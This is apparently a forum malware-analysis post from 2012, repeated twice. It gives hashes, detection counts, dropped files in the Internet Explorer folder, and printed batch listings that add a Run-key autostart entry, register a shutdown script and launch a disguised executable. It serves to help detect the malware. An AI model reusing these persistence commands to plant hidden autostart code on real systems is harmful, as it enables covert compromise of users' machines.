01.06.2012, 16:42
Malware info:
SHA256: 25cc8f985fb2dcbc626c4339e4fa06fa18b988f83b03126753d4b1767b874421
SHA1: 9f6586f2059e3f68f1a52aa7384500fae92f9cfb
MD5: c953ad62942f002ef8f0e7eac2f31e64
File size: 163.8 KB ( 167698 bytes )
VT info (30/42):
Changes in the system:
opnerRi.bat listing :
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "" /t REG_SZ /d C:\WINDOWS\inf\ypangolin.bat /f
UFOUFO\UECOMT8f764frOyueniIiLi6fky/yziI+PiZk=
ypangolin.bat listing :
start C:\"Program Files"\"Internet Explorer"\opnerRi.exe
SHA256: 25cc8f985fb2dcbc626c4339e4fa06fa18b988f83b03126753d4b1767b874421
SHA1: 9f6586f2059e3f68f1a52aa7384500fae92f9cfb
MD5: c953ad62942f002ef8f0e7eac2f31e64
File size: 163.8 KB ( 167698 bytes )
VT info (30/42):
[Aby zobaczyć linki, zarejestruj się tutaj]
Changes in the system:
- Registry Key:
HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\0\Script "%Program Files%\Internet Explorer\opnerRi.bat"
Files:
%Program Files%\Internet Explorer\crlss.exe
%Program Files%\Internet Explorer\filer.tmp
%Program Files%\Internet Explorer\opnerRi.bat
%Program Files%\Internet Explorer\opnerRi.exe
%WinDir%\inf\ypangolin.bat
%SysDir%\GroupPolicy\gpt.ini
%SysDir%\GroupPolicy\Machine\Scripts\scripts.ini
Treść widoczna jedynie dla zarejestrowanych użytkowników
opnerRi.bat listing :
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "" /t REG_SZ /d C:\WINDOWS\inf\ypangolin.bat /f
UFOUFO\UECOMT8f764frOyueniIiLi6fky/yziI+PiZk=
ypangolin.bat listing :
start C:\"Program Files"\"Internet Explorer"\opnerRi.exe